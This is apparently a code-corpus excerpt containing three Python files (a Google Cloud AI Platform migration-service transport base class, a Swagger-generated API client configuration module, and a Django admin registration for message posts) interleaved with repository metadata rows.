from google.cloud.aiplatform_v1beta1.types import migration_service
from google.longrunning import operations_pb2 # type: ignore
# Client-info metadata sent with API requests; fall back to a versionless
# ClientInfo when the google-cloud-aiplatform distribution is not installed
# (e.g. when running from a source checkout).
try:
    DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
        gapic_version=pkg_resources.get_distribution(
            "google-cloud-aiplatform",
        ).version,
    )
except pkg_resources.DistributionNotFound:
    DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
# Detect the installed google-auth version; used by _get_scopes_kwargs to
# pick the right keyword arguments.  None means "could not determine".
try:
    # google.auth.__version__ was added in 1.26.0
    _GOOGLE_AUTH_VERSION = google.auth.__version__
except AttributeError:
    try:  # try pkg_resources if it is available
        _GOOGLE_AUTH_VERSION = pkg_resources.get_distribution("google-auth").version
    except pkg_resources.DistributionNotFound:  # pragma: NO COVER
        _GOOGLE_AUTH_VERSION = None
class MigrationServiceTransport(abc.ABC):
    """Abstract transport class for MigrationService.

    Concrete subclasses (gRPC / gRPC-asyncio) implement the abstract
    properties below; this base handles credential resolution and
    method wrapping shared by all transports.
    """

    # OAuth scopes requested when default credentials are resolved.
    AUTH_SCOPES = ("https://www.googleapis.com/auth/cloud-platform",)

    DEFAULT_HOST: str = "aiplatform.googleapis.com"

    def __init__(
        self,
        *,
        host: str = DEFAULT_HOST,
        credentials: ga_credentials.Credentials = None,
        credentials_file: Optional[str] = None,
        scopes: Optional[Sequence[str]] = None,
        quota_project_id: Optional[str] = None,
        client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
        always_use_jwt_access: Optional[bool] = False,
        **kwargs,
    ) -> None:
        """Instantiate the transport.

        Args:
            host (Optional[str]):
                The hostname to connect to.
            credentials (Optional[google.auth.credentials.Credentials]): The
                authorization credentials to attach to requests. These
                credentials identify the application to the service; if none
                are specified, the client will attempt to ascertain the
                credentials from the environment.
            credentials_file (Optional[str]): A file with credentials that can
                be loaded with :func:`google.auth.load_credentials_from_file`.
                This argument is mutually exclusive with credentials.
            scopes (Optional[Sequence[str]]): A list of scopes.
            quota_project_id (Optional[str]): An optional project to use for billing
                and quota.
            client_info (google.api_core.gapic_v1.client_info.ClientInfo):
                The client info used to send a user-agent string along with
                API requests. If ``None``, then default info will be used.
                Generally, you only need to set this if you're developing
                your own client library.
            always_use_jwt_access (Optional[bool]): Whether self signed JWT should
                be used for service account credentials.

        Raises:
            google.api_core.exceptions.DuplicateCredentialArgs: If both
                ``credentials`` and ``credentials_file`` are given.
        """
        # Save the hostname. Default to port 443 (HTTPS) if none is specified.
        if ":" not in host:
            host += ":443"
        self._host = host

        scopes_kwargs = self._get_scopes_kwargs(self._host, scopes)

        # Save the scopes.
        self._scopes = scopes

        # If no credentials are provided, then determine the appropriate
        # defaults.
        if credentials and credentials_file:
            raise core_exceptions.DuplicateCredentialArgs(
                "'credentials_file' and 'credentials' are mutually exclusive"
            )

        if credentials_file is not None:
            credentials, _ = google.auth.load_credentials_from_file(
                credentials_file, **scopes_kwargs, quota_project_id=quota_project_id
            )
        elif credentials is None:
            credentials, _ = google.auth.default(
                **scopes_kwargs, quota_project_id=quota_project_id
            )

        # If the credentials is service account credentials, then always try to use self signed JWT.
        if (
            always_use_jwt_access
            and isinstance(credentials, service_account.Credentials)
            and hasattr(service_account.Credentials, "with_always_use_jwt_access")
        ):
            credentials = credentials.with_always_use_jwt_access(True)

        # Save the credentials.
        self._credentials = credentials

    # TODO(busunkim): This method is in the base transport
    # to avoid duplicating code across the transport classes. These functions
    # should be deleted once the minimum required versions of google-auth is increased.

    # TODO: Remove this function once google-auth >= 1.25.0 is required
    @classmethod
    def _get_scopes_kwargs(
        cls, host: str, scopes: Optional[Sequence[str]]
    ) -> Dict[str, Optional[Sequence[str]]]:
        """Returns scopes kwargs to pass to google-auth methods depending on the google-auth version"""
        scopes_kwargs = {}

        # google-auth >= 1.25.0 accepts both `scopes` and `default_scopes`;
        # older versions only accept `scopes`.
        if _GOOGLE_AUTH_VERSION and (
            packaging.version.parse(_GOOGLE_AUTH_VERSION)
            >= packaging.version.parse("1.25.0")
        ):
            scopes_kwargs = {"scopes": scopes, "default_scopes": cls.AUTH_SCOPES}
        else:
            scopes_kwargs = {"scopes": scopes or cls.AUTH_SCOPES}

        return scopes_kwargs

    def _prep_wrapped_messages(self, client_info):
        """Wrap each RPC method with retry/timeout/user-agent metadata."""
        # Precompute the wrapped methods.
        self._wrapped_methods = {
            self.search_migratable_resources: gapic_v1.method.wrap_method(
                self.search_migratable_resources,
                default_timeout=None,
                client_info=client_info,
            ),
            self.batch_migrate_resources: gapic_v1.method.wrap_method(
                self.batch_migrate_resources,
                default_timeout=None,
                client_info=client_info,
            ),
        }

    @property
    def operations_client(self) -> operations_v1.OperationsClient:
        """Return the client designed to process long-running operations."""
        # Implemented by concrete transports.
        raise NotImplementedError()

    @property
    def search_migratable_resources(
        self,
    ) -> Callable[
        [migration_service.SearchMigratableResourcesRequest],
        Union[
            migration_service.SearchMigratableResourcesResponse,
            Awaitable[migration_service.SearchMigratableResourcesResponse],
        ],
    ]:
        # Implemented by concrete transports; async transports return an
        # awaitable (hence the Union in the return annotation).
        raise NotImplementedError()

    @property
    def batch_migrate_resources(
        self,
    ) -> Callable[
        [migration_service.BatchMigrateResourcesRequest],
        Union[operations_pb2.Operation, Awaitable[operations_pb2.Operation]],
    ]:
        # Implemented by concrete transports; returns a long-running
        # operation handle.
        raise NotImplementedError()
__all__ = ("MigrationServiceTransport",)
| [
"noreply@github.com"
] | orionnye.noreply@github.com |
5a30388c978d42ea4fa0fd92c353044d84de3910 | 0603abc3e7936a77ef399203341d416116077865 | /cli_lic/configuration.py | e83dd2632e0a9535502deef9ddcc45cde311ee01 | [] | no_license | novvv/api_lic | 97ddbe70c1b77171a2e3820b72a02ef3eba9e12c | ad00863818c18f84b556774205119102dbefb4dd | refs/heads/master | 2020-03-31T14:14:51.267998 | 2019-04-12T10:48:32 | 2019-04-12T10:48:32 | 152,286,300 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,083 | py | # coding: utf-8
"""
LICENSE API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 1.0.19
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import urllib3
import sys
import logging
from six import iteritems
from six.moves import http_client as httplib
def singleton(cls, *args, **kw):
    """Decorator: make every call return one shared, lazily-built instance.

    The instance is constructed with the given *args*/*kw* on first use
    and cached for all later calls.
    """
    instances = {}

    def _singleton():
        # EAFP: after the first call the instance always exists.
        try:
            return instances[cls]
        except KeyError:
            instances[cls] = cls(*args, **kw)
            return instances[cls]

    return _singleton
@singleton
class Configuration(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Ref: https://github.com/swagger-api/swagger-codegen
    Do not edit the class manually.

    The @singleton decorator means every Configuration() call returns the
    same shared instance.
    """

    def __init__(self):
        """
        Constructor
        """
        # Default Base url
        self.host = "http://localhost:8012/v1"
        # Default api client
        self.api_client = None
        # Temp file folder for downloading files
        self.temp_folder_path = None

        # Authentication Settings
        # dict to store API key(s)
        self.api_key = {}
        # dict to store API prefix (e.g. Bearer)
        self.api_key_prefix = {}
        # Username for HTTP basic authentication
        self.username = ""
        # Password for HTTP basic authentication
        self.password = ""

        # Logging Settings
        self.logger = {}
        self.logger["package_logger"] = logging.getLogger("cli_lic")
        self.logger["urllib3_logger"] = logging.getLogger("urllib3")
        # Log format.  NOTE: must be assigned before logger_file below —
        # the logger_format setter creates self.logger_formatter, which the
        # logger_file setter's handlers rely on.
        self.logger_format = '%(asctime)s %(levelname)s %(message)s'
        # Log stream handler
        self.logger_stream_handler = None
        # Log file handler
        self.logger_file_handler = None
        # Debug file location
        self.logger_file = None
        # Debug switch
        self.debug = False

        # SSL/TLS verification
        # Set this to false to skip verifying SSL certificate when calling API from https server.
        self.verify_ssl = True
        # Set this to customize the certificate file to verify the peer.
        self.ssl_ca_cert = None
        # client certificate file
        self.cert_file = None
        # client key file
        self.key_file = None

        # Proxy URL
        self.proxy = None
        # Safe chars for path_param
        self.safe_chars_for_path_param = ''

    @property
    def logger_file(self):
        """
        Gets the logger_file.
        """
        return self.__logger_file

    @logger_file.setter
    def logger_file(self, value):
        """
        Sets the logger_file.

        If the logger_file is None, then add stream handler and remove file handler.
        Otherwise, add file handler and remove stream handler.

        :param value: The logger_file path.
        :type: str
        """
        self.__logger_file = value
        if self.__logger_file:
            # If set logging file,
            # then add file handler and remove stream handler.
            self.logger_file_handler = logging.FileHandler(self.__logger_file)
            self.logger_file_handler.setFormatter(self.logger_formatter)
            for _, logger in iteritems(self.logger):
                logger.addHandler(self.logger_file_handler)
                if self.logger_stream_handler:
                    logger.removeHandler(self.logger_stream_handler)
        else:
            # If not set logging file,
            # then add stream handler and remove file handler.
            self.logger_stream_handler = logging.StreamHandler()
            self.logger_stream_handler.setFormatter(self.logger_formatter)
            for _, logger in iteritems(self.logger):
                logger.addHandler(self.logger_stream_handler)
                if self.logger_file_handler:
                    logger.removeHandler(self.logger_file_handler)

    @property
    def debug(self):
        """
        Gets the debug status.
        """
        return self.__debug

    @debug.setter
    def debug(self, value):
        """
        Sets the debug status.

        Also toggles DEBUG-level logging and http.client wire tracing.

        :param value: The debug status, True or False.
        :type: bool
        """
        self.__debug = value
        if self.__debug:
            # if debug status is True, turn on debug logging
            for _, logger in iteritems(self.logger):
                logger.setLevel(logging.DEBUG)
            # turn on httplib debug
            httplib.HTTPConnection.debuglevel = 1
        else:
            # if debug status is False, turn off debug logging,
            # setting log level to default `logging.WARNING`
            for _, logger in iteritems(self.logger):
                logger.setLevel(logging.WARNING)
            # turn off httplib debug
            httplib.HTTPConnection.debuglevel = 0

    @property
    def logger_format(self):
        """
        Gets the logger_format.
        """
        return self.__logger_format

    @logger_format.setter
    def logger_format(self, value):
        """
        Sets the logger_format.

        The logger_formatter will be updated when sets logger_format.

        :param value: The format string.
        :type: str
        """
        self.__logger_format = value
        self.logger_formatter = logging.Formatter(self.__logger_format)

    def get_api_key_with_prefix(self, identifier):
        """
        Gets API key (with prefix if set).

        Returns None when no key is stored for *identifier*.

        :param identifier: The identifier of apiKey.
        :return: The token for api key authentication.
        """
        if self.api_key.get(identifier) and self.api_key_prefix.get(identifier):
            return self.api_key_prefix[identifier] + ' ' + self.api_key[identifier]
        elif self.api_key.get(identifier):
            return self.api_key[identifier]

    def get_basic_auth_token(self):
        """
        Gets HTTP basic authentication header (string).

        :return: The token for basic HTTP authentication.
        """
        return urllib3.util.make_headers(basic_auth=self.username + ':' + self.password)\
            .get('authorization')

    def auth_settings(self):
        """
        Gets Auth Settings dict for api client.

        :return: The Auth Settings information dict.
        """
        return {
            'auth_token':
                {
                    'type': 'api_key',
                    'in': 'header',
                    'key': 'X-Auth-Token',
                    'value': self.get_api_key_with_prefix('X-Auth-Token')
                },
        }

    def to_debug_report(self):
        """
        Gets the essential information for debugging.

        :return: The report for debugging.
        """
        return "Python SDK Debug Report:\n"\
               "OS: {env}\n"\
               "Python Version: {pyversion}\n"\
               "Version of the API: 1.0.19\n"\
               "SDK Package Version: 1.0.0".\
            format(env=sys.platform, pyversion=sys.version)
| [
"novvvster@gmail.com"
] | novvvster@gmail.com |
fad8117f1daed26a450221f93a2411e385332a25 | efd99210b16aa74040ae7caf938ae6843043eb37 | /community/admin.py | 381d8b709fb9a47ef17862ee11cd737978c85277 | [] | no_license | Bourkekev/ms4-power-fitness-gym | 6fd5465403e45ea0cc89650bf001a53069bc4b7a | fb4c6219a57d4ffe994739b4e80a20f12681225c | refs/heads/main | 2023-03-22T08:09:23.657835 | 2021-01-30T12:22:17 | 2021-01-30T12:22:17 | 310,539,738 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 565 | py | from django.contrib import admin
from .models import MessageTopic, MessagePost
class MessagePostAdmin(admin.ModelAdmin):
    """
    Admin interface for MessagePost: posts are viewable but all fields are
    read-only, so content cannot be edited from the admin site.
    """
    # Every field read-only: admins can inspect but not alter posts.
    readonly_fields = (
        'message',
        'topic',
        'created_at',
        'updated_at',
        'created_by',
        'updated_by',
    )
    # Columns shown on the change-list page.
    list_display = (
        'message',
        'topic',
        'created_at',
        'created_by',
    )
    # Newest authors first.
    ordering = ('-created_by',)


# MessageTopic uses the default ModelAdmin.
admin.site.register(MessageTopic)
admin.site.register(MessagePost, MessagePostAdmin)
| [
"bourkekev@gmail.com"
] | bourkekev@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.